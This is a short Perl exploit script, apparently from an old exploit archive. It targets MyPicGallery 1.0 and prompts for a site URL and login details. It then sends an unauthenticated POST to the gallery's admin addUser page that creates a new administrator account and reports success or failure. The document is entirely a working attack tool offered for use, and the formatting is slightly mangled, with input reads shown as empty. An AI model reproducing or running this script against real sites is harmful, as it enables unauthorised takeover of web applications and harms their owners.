#!/usr/bin/perl use strict; use LWP::UserAgent; print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n"; print "-+-- Discovered && Coded By: t0pP8uZz --+-\n"; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n"; print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n"; print "\nEnter URL(http://site.com): "; chomp(my $url=); print "\nEnter Username(create's a admin username): "; chomp(my $usr=); print "\nEnter Password(create's a admin password): "; chomp(my $pwd=); my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" ); my $ob = $ua->post( $url."/admin/addUser.php?userID=admin", { "submit" => 1, # ugly? "fullName" => "null", "userName" => $usr, "password" => $pwd, "conPassword" => $pwd, "uType" => "admin", "email" => "null\@null.com" } ); if($ob->is_success && index($ob->content, "added") != -1) { print "\nAdmin Account Added! Login at: ".$url."\n"; } else { print "\nExploit Failed! username already exists?"; }